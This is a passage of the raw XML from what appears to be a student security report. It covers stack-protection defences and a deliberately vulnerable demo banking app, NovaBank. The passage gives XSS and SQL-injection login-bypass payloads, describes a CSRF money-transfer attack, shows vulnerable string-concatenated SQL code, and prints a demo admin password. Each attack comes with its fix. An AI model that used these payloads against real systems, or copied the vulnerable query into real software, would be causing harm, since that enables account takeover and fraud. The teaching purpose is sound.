        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc242551122"/>
      <w:r>
        <w:t>1.6  Defences</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="42CF77E3" w14:textId="6359A626" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:r>
        <w:t>The attack is prevented in practice by the protections that were disabled for this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA8DBED" w14:textId="161941C4" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Stack canaries - a random guard value placed before the return address; strcpy overflow corrupts it and the program aborts before returning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387BDA66" w14:textId="02764191" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Non-executable stack (NX / DEP) - the CPU refuses to execute instructions located on the stack, so the injected shellcode cannot run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4E8DE3" w14:textId="36A60EC3" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>ASLR and PIE - randomise stack and code addresses each run, so a hard-coded return address no longer points at the sled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B484795" w14:textId="0EEEE903" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Safer APIs and bounds checking - using strncpy/snprintf with an explicit length, or validating input size, stops the out-of-bounds write at its source.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A2BDFF" w14:textId="0147E03E" w:rsidR="00A65037" w:rsidRDefault="00A65037">
      <w:pPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40C4A54C" w14:textId="53062F0C" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc242551124"/>
      <w:r>
        <w:t>Part 2 - Web Application Security (NovaBank)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="6EFA3B4A" w14:textId="10C17D79" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc242551125"/>
      <w:r>
        <w:t>2.1  Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="4C8D80B8" w14:textId="61A06216" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:r>
        <w:t>NovaBank is a small but real, database-driven banking web application built for this task with Node.js, Express</w:t>
      </w:r>
      <w:r w:rsidR="00796CD7">
        <w:t>.js</w:t>
      </w:r>
      <w:r>
        <w:t>, and SQLite (via the built-in node:sqlite module). It exists in a single codebase with two switchable modes selected at start-up:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32013122" w14:textId="72C6AEA1" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>vulnerable mode (npm run vuln) - every vulnerability below works end-to-end.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CD6D96" w14:textId="61F1E29D" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>safe mode (npm run safe) - the same features, with each vulnerability genuinely fixed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B157F3E" w14:textId="069BF668" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:r>
        <w:t xml:space="preserve">A line at the top of every page shows the active mode (mode: vulnerable or mode: safe). The intentionally plain, unstyled pages keep the focus on the security behaviour rather than presentation. In the code a single flag (config.isSafe) switches each feature between its vulnerable and fixed path. The application demonstrates reflected, stored and DOM-based XSS; CSRF; and SQL </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>injection at easy, intermediate and advanced levels - each shown succeeding in vulnerable mode and blocked in safe mode.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04207059" w14:textId="1062C458" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38132BAD" wp14:editId="17CDEFC8">
            <wp:extent cx="5715000" cy="3571717"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="10160"/>
            <wp:docPr id="13085041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504125"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15000" cy="3571717"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="9525">
                      <a:solidFill>
                        <a:srgbClr val="808080"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4DCD29" w14:textId="60DFC539" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="179A25F5" w14:textId="039E16BE" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:r>
        <w:t>Demo accounts (passwords are stored in plaintext on purpose, only so the SQL-injection data-extraction stage is demonstrable): admin / S3cr3t-Admin!.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FD832E" w14:textId="469E2A04" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc242551126"/>
      <w:r>
        <w:t>2.2  Cross-Site Scripting - Reflected</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="7CB37F1A" w14:textId="0D20098D" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:r>
        <w:t>Location: GET /search?q=   The search term is written back into the results heading. In vulnerable mode it is interpolated into the HTML without encoding, so any markup in the term is parsed and executed by the browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2787BBC5" w14:textId="1D3B432B" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:r>
        <w:t>Payload:   &lt;script&gt;alert('Reflected-XSS')&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9DD8ED" w14:textId="4E980537" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:r>
        <w:t>In vulnerable mode the term is written straight into the page HTML, so the injected script tag executes as the page renders:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A27710" w14:textId="746901E0" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B79DCE4" wp14:editId="149E4BC8">
            <wp:extent cx="5715000" cy="3571717"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="10160"/>
            <wp:docPr id="197142460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424608"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15000" cy="3571717"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="9525">
                      <a:solidFill>
                        <a:srgbClr val="808080"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0390BE" w14:textId="0FD4C2C9" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:r>
        <w:t>Fix (safe mode): the term is HTML-encoded on output with an escape function that converts &lt; &gt; &amp; " ' to their HTML entities. The same payload is then shown as literal text and never parsed as markup:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1514CAD2" w14:textId="243D7330" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6478C7A3" wp14:editId="58822A51">
            <wp:extent cx="5715000" cy="3571717"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="10160"/>
            <wp:docPr id="180048288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482885"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15000" cy="3571717"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="9525">
                      <a:solidFill>
                        <a:srgbClr val="808080"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6738BE95" w14:textId="06F44E1F" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc242551127"/>
      <w:r>
        <w:t>2.3  Cross-Site Scripting - Stored</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="09F5CE70" w14:textId="35FD5636" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:r>
        <w:t>Location: POST /support  -&gt;  rendered on GET /support for every visitor. A message body is saved to the database and later rendered raw, so the injected script runs for anyone who opens the support page - a persistent attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219367F3" w14:textId="2F07915F" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:r>
        <w:t>Payload:   &lt;script&gt;alert('Stored-XSS')&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2955FAD6" w14:textId="18615AB4" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69E159EB" wp14:editId="4A311868">
            <wp:extent cx="5715000" cy="3571717"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="10160"/>
            <wp:docPr id="8348627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862711"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15000" cy="3571717"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="9525">
                      <a:solidFill>
                        <a:srgbClr val="808080"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF465EA" w14:textId="5DF6C3C8" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:r>
        <w:t>Fix (safe mode): the stored body is HTML-encoded when it is rendered. Storing raw input is acceptable; the defence is encoding on output, which turns the stored markup into harmless text:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0596FA" w14:textId="1BDE4189" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3884E608" wp14:editId="52E58521">
            <wp:extent cx="5715000" cy="3571717"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="10160"/>
            <wp:docPr id="50569721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697211"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15000" cy="3571717"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="9525">
                      <a:solidFill>
                        <a:srgbClr val="808080"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="724B0AC6" w14:textId="43E9328F" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc242551128"/>
      <w:r>
        <w:t>2.4  Cross-Site Scripting - DOM-based</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="56DAA7AD" w14:textId="1D5F718A" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:r>
        <w:t>Location: GET /profile  -&gt;  public/dom-xss.js. The vulnerability is entirely client-side: a script reads the URL fragment (everything after #, which never reaches the server) and assigns it to element.innerHTML, a dangerous DOM sink.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4276EC48" w14:textId="675353B4" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:r>
        <w:t>Payload:   /profile#&lt;img src=x onerror=alert('DOM-XSS')&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794F5904" w14:textId="2F5B6572" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="604F93AA" wp14:editId="6675DE7E">
            <wp:extent cx="5715000" cy="3571717"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="10160"/>
            <wp:docPr id="69701506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015066"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15000" cy="3571717"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="9525">
                      <a:solidFill>
                        <a:srgbClr val="808080"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E418037" w14:textId="01E07C66" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:r>
        <w:t>Fix (safe mode): the same value is assigned with element.textContent instead of innerHTML. textContent never parses HTML, so the fragment is shown as text:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564466C6" w14:textId="22844E64" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48C00F18" wp14:editId="24D04F10">
            <wp:extent cx="5715000" cy="3571717"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="10160"/>
            <wp:docPr id="22161142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611420"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15000" cy="3571717"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="9525">
                      <a:solidFill>
                        <a:srgbClr val="808080"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AC6FC7" w14:textId="0948D6D3" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc242551129"/>
      <w:r>
        <w:t>2.5  Cross-Site Request Forgery (CSRF)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="48E46F64" w14:textId="4ACEAAF0" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:r>
        <w:t>Location: POST /transfer (a state-changing action - moving money). In vulnerable mode the endpoint performs the transfer purely on the strength of the session cookie, with no unguessable token to prove the request was intended. A malicious page that auto-submits a hidden form can therefore move a logged-in victim's money without consent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E509F56" w14:textId="55FD9A74" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Attack: while logged in as alice (balance $5230.75), the victim opens a malicious page that auto-submits a transfer of $500 to NB-1000-ATTACKER.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEA37E1" w14:textId="751D5499" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01435D68" wp14:editId="1C23CF31">
            <wp:extent cx="5715000" cy="3571717"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="10160"/>
            <wp:docPr id="117447998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479986"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15000" cy="3571717"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="9525">
                      <a:solidFill>
                        <a:srgbClr val="808080"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B040CF2" w14:textId="426BF868" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="432578DC" wp14:editId="75641919">
            <wp:extent cx="5715000" cy="3571717"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="10160"/>
            <wp:docPr id="187465315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653150"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15000" cy="3571717"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="9525">
                      <a:solidFill>
                        <a:srgbClr val="808080"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A399276" w14:textId="6969167E" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:r>
        <w:t>Fix (safe mode): every state-changing request must carry a per-session synchronizer token (_csrf) that the attacker's page cannot read. Requests without a valid token are rejected with HTTP 403, and the session cookie is additionally set SameSite=Strict as defence-in-depth:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72637D35" w14:textId="1236DFA7" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E2EC815" wp14:editId="3BB6F865">
            <wp:extent cx="5715000" cy="3571717"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="10160"/>
            <wp:docPr id="89926385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263854"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15000" cy="3571717"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="9525">
                      <a:solidFill>
                        <a:srgbClr val="808080"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F04528" w14:textId="62DB343D" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B518EA8" w14:textId="42DA94B4" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc242551130"/>
      <w:r>
        <w:t>2.6  SQL Injection - Easy (authentication bypass)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="2AB044E2" w14:textId="474F5DDB" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:r>
        <w:t>Location: POST /login. In vulnerable mode the username and password are concatenated directly into the SQL query, so input can change the query's structure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FA76A7" w14:textId="18DCBCB6" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>const sql = "SELECT * FROM users WHERE username = '" + username +</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            "' AND password = '" + password + "'";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C62960" w14:textId="782E10C7" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:r>
        <w:t>Payload (username field):   ' OR '1'='1' --      (password: anything)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2150A545" w14:textId="2DE10E5A" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:r>
        <w:t>The trailing comment removes the password check, so the query returns the first user and logs the attacker in as alice with no valid credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EE7E90" w14:textId="58C9C1DF" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F1F6213" wp14:editId="5DD7D298">
            <wp:extent cx="5715000" cy="3571717"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="10160"/>
            <wp:docPr id="7531626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16268"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15000" cy="3571717"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="9525">
                      <a:solidFill>
                        <a:srgbClr val="808080"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="529E2DD3" w14:textId="1950D5B1" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Figure 2.11 - The injection payload entered in the username field.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435C38AE" w14:textId="0188253C" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F09116A" wp14:editId="45A4C9A0">
            <wp:extent cx="5715000" cy="3571717"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="10160"/>
            <wp:docPr id="153236403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364034"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15000" cy="3571717"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="9525">
                      <a:solidFill>
                        <a:srgbClr val="808080"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C00537C" w14:textId="538F6C86" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Figure 2.12 - Vulnerable mode: authentication is bypassed - signed in as alice with no valid password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC27F75" w14:textId="36A0911C" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:r>
        <w:t>Fix (safe mode): a parameterized query binds the input as data (never as SQL), plus a username format check. The payload can no longer alter the query structure and the login is refused:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122627CE" w14:textId="2AE1326D" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>if (!/^[A-Za-z0-9_.\-]{1,32}$/.test(username)) return reject();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>db.prepare('SELECT * FROM users WHERE username = ? AND password = ?')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  .get(username, password);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8C677C" w14:textId="49B682DD" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79C724DC" wp14:editId="240096C5">
            <wp:extent cx="5715000" cy="3571717"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="10160"/>
            <wp:docPr id="20717083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70836"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15000" cy="3571717"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="9525">
                      <a:solidFill>
                        <a:srgbClr val="808080"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="499C1B13" w14:textId="04C795AD" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Figure 2.13 - Safe mode: the injection is rejected with "Invalid username format." (HTTP 400).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792EB7F7" w14:textId="10548A53" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc242551131"/>
      <w:r>
        <w:t>2.7  SQL Injection - Intermediate (blind, boolean-based)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="630568C7" w14:textId="619176FA" w:rsidR="00A65037" w:rsidRDefault="00A65037" w:rsidP="00A65037">
      <w:r>
